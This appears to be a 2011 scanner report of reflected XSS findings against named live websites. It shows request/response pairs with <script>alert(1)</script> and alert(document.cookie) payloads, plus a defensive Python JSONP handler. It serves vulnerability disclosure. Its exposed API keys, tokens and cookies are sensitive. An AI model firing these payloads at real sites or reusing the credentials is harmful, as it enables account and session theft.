GET /v1/profile.json?api_key=6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c&callback=Demdex.parseBizo HTTP/1.1 Host: api.bizographics.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KRShFj6bKbiijaj5XcunNcMDa7Re6IGD4lLFCw41jWbyOAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtT8sOM0TiiisRAyMfy5dfAVhDEVUJBxdqAyAsVh4uYPLmIgwbisDgBSipgnUuNumFpPoipAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie;
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Wed, 02 Feb 2011 16:18:36 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 92 Connection: Close
Unknown API key: (6332f8b7316a4d1284e9c1217a367347af475<script>alert(1)</script>5b56c3fcd0c)
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b4387(a)c27091d8173 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /EntityImageHandler.ashxb4387(a)c27091d8173 HTTP/1.1 Host: api.blogburst.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 16:18:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server: psnapib X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/plain; charset=utf-8 Content-Length: 201
Error handler problem: Error Number: B8BUa0w7Ilp7zBNRYRdWMLni Error Path: /EntityImageHandler.ashxb4387(a)c27091d8173 Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 80c92(a)e7e03c35472 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.ico80c92(a)e7e03c35472 HTTP/1.1 Host: api.blogburst.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server: psnapib X-AspNet-Version: 2.0.50727 X-Compressed-By: HttpCompress Date: Wed, 02 Feb 2011 19:10:36 GMT Content-Length: 189
Error handler problem: Error Number: B83sUW5V9btfzEZ9C74xOolh Error Path: /favicon.ico80c92(a)e7e03c35472 Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f5c81(a)8b15d9b73ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba HTTP/1.1 Host: api.blogburst.com Proxy-Connection: keep-alive Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET server: psnapib X-AspNet-Version: 2.0.50727 X-Compressed-By: HttpCompress Date: Wed, 02 Feb 2011 15:32:08 GMT Content-Length: 205
Error handler problem: Error Number: B80iwlBCmlTpz5Pig5CAws6o Error Path: /v1.0/WidgetDeliveryProxy.jsf5c81(a)8b15d9b73ba Error Message: No http handler was found for request type 'GET' Error Host: psnapib
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e8e6e(a)55b1a46fc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7 HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:19 GMT
Content-Length: 207

Error handler problem:
Error Number: B94M87SkpIdWCgjC0l2bFGg
Error Path: /v1.0/WidgetDeliveryProxyStub.jse8e6e(a)55b1a46fc7
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib
The value of REST URL parameter 1 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f4506(a)4a5cdf0844b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:36 GMT
Content-Length: 209

Error handler problem:
Error Number: B8WJgPc8mOdez6tZwoiCJoTl
Error Path: /v1.0f4506(a)4a5cdf0844b/WidgetDeliveryService.ashx
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib
The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b1dc(a)5a857af5c5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d?bbTransport=css&bbWidgetId=B7mDxwAeoI9czDO7YpXG1bi8&bbHostUrl=http%3A//www.ehow.com/computer-software/ HTTP/1.1
Host: api.blogburst.com
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/computer-software/?206d4'-alert(1)-'dbefd3749fe=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server: psnapib
X-AspNet-Version: 2.0.50727
PluckOriginServer: psnapib
X-Compressed-By: HttpCompress
Date: Wed, 02 Feb 2011 15:32:41 GMT
Content-Length: 208

Error handler problem:
Error Number: B7fOWSgosfbjAnIBtXULjlA
Error Path: /v1.0/WidgetDeliveryService.ashx8b1dc(a)5a857af5c5d
Error Message: No http handler was found for request type 'GET'
Error Host: psnapib
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 5fda3<script>alert(1)</script>05613b280fe was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/v1/ip.json?token=9629e1a2b682d7afd8c9cc104ad125c08fa0b490&callback=demandbase_parse5fda3<script>alert(1)</script>05613b280fe HTTP/1.1
Host: api.demandbase.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/privacy/2o7?f=2o7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
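The callback finding above is the classic JSONP reflection: the function name the client asks for is written verbatim into the response body. The handler below is an added example, not demandbase's code; the names build_jsonp_response, js_safe_json and CALLBACK_RE, and the sample data, are assumptions made for illustration. It allow-lists the callback as a dotted JavaScript identifier and refuses anything else rather than trying to sanitise it, escapes the characters inside the JSON body that could end a script element, and sets the content type and X-Content-Type-Options headers so a browser navigating to the URL will not sniff the body as HTML.

```python
import json
import re

# Allow-list for the callback: a dotted JavaScript identifier path such as
# demandbase_parse or window.cb.done. Anything else is rejected outright.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
MAX_CALLBACK_LEN = 64


def js_safe_json(obj):
    """Serialise obj as JSON that is also safe inside a script response.

    json.dumps escapes quotes, backslashes and control characters but leaves
    < > & and U+2028/U+2029 alone, so a value containing </script> could
    otherwise terminate the element if the response were rendered as HTML.
    """
    text = json.dumps(obj, separators=(",", ":"))
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026"),
                    ("\u2028", "\\u2028"), ("\u2029", "\\u2029")):
        text = text.replace(ch, esc)
    return text


def build_jsonp_response(callback, data):
    """Return (status, headers, body) for a JSON/JSONP endpoint.

    With no callback the data is returned as plain JSON. With a callback the
    name must match CALLBACK_RE or the request is refused with 400, so the
    reflected name can never contain quotes, brackets or markup.
    """
    headers = {"X-Content-Type-Options": "nosniff"}  # no MIME sniffing of the body
    if callback is None:
        headers["Content-Type"] = "application/json; charset=utf-8"
        return 200, headers, js_safe_json(data)
    if len(callback) > MAX_CALLBACK_LEN or not CALLBACK_RE.match(callback):
        headers["Content-Type"] = "text/plain; charset=utf-8"
        return 400, headers, "invalid callback"
    headers["Content-Type"] = "application/javascript; charset=utf-8"
    # The leading /**/ is a conventional guard so the body never begins with
    # attacker-chosen bytes, whatever the callback name.
    body = "/**/" + callback + "(" + js_safe_json(data) + ");"
    return 200, headers, body


if __name__ == "__main__":
    # Constructed sample data; 203.0.113.0/24 is a documentation range.
    sample = {"ip": "203.0.113.5"}
    print(build_jsonp_response("demandbase_parse", sample))
    print(build_jsonp_response("demandbase_parse5fda3<script>alert(1)</script>05613b280fe", sample))
```

Rejecting the callback rather than stripping characters from it keeps the decision auditable: either the name is an identifier path or the request fails. The nosniff header matters even when the content type is right, because older browsers would otherwise inspect a body that begins with a tag and treat it as HTML.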
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 38302<script>alert(1)</script>c482f5e0c50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php. HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3788
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for http://apptools.com/examples38302<script>alert(1)</script>c482f5e0c50/tableheight.php was not able to be displayed.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8e2a<script>alert(1)</script>5612df9d36a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3789
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for http://apptools.com/examples/tableheight.php.c8e2a<script>alert(1)</script>5612df9d36a was not able to be displayed.</p>
...[SNIP]...
1.70. http://apptools.com/examples/tableheight.php. [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://apptools.com
Path: /examples/tableheight.php.
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 96edc<script>alert(1)</script>1447630590d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 HTTP/1.1
Host: apptools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:18:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Length: 3792
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for http://apptools.com/examples/tableheight.php.?96edc<script>alert(1)</script>1447630590d=1 was not able to be displayed.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2523f<script>alert(1)</script>3ded236ecaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:31 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for http://apptools.com/styles2523f<script>alert(1)</script>3ded236ecaa/apptools.css was not able to be displayed.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e507e<script>alert(1)</script>60df3ed154 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles/apptools.csse507e<script>alert(1)</script>60df3ed154 HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:41 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for http://apptools.com/styles/apptools.csse507e<script>alert(1)</script>60df3ed154 was not able to be displayed.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78363<script>alert(1)</script>31482200f99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles78363<script>alert(1)</script>31482200f99/print.css HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:29 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for http://apptools.com/styles78363<script>alert(1)</script>31482200f99/print.css was not able to be displayed.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7876d<script>alert(1)</script>1b072629eeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles/print.css7876d<script>alert(1)</script>1b072629eeb HTTP/1.1
Host: apptools.com
Proxy-Connection: keep-alive
Referer: http://apptools.com/examples38302%3Cscript%3Ealert(document.cookie)%3C/script%3Ec482f5e0c50/tableheight.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 20:26:40 GMT
Server: Apache
X-Mod-Pagespeed: 0.9.11.5-293
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang=en><!-- InstanceBegin template="file:///C|/My Projects/Dreamweaver/AppTools/Templates/Base Page
...[SNIP]...
<p>We're sorry, but your request for http://apptools.com/styles/print.css7876d<script>alert(1)</script>1b072629eeb was not able to be displayed.</p>
...[SNIP]...
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 9fb5f<script>alert(1)</script>bb7775bca59 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=39fb5f<script>alert(1)</script>bb7775bca59&c2=6035338&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload a97d8<script>alert(1)</script>9a0c4e010c5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=3&c2=6035338a97d8<script>alert(1)</script>9a0c4e010c5&c3=5070033&c4=40443113&c5=59067898&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 09 Feb 2011 15:31:53 GMT
Date: Wed, 02 Feb 2011 15:31:53 GMT
Connection: close
Content-Length: 3603
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 29d7a<script>alert(1)</script>1b41605cfe3 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
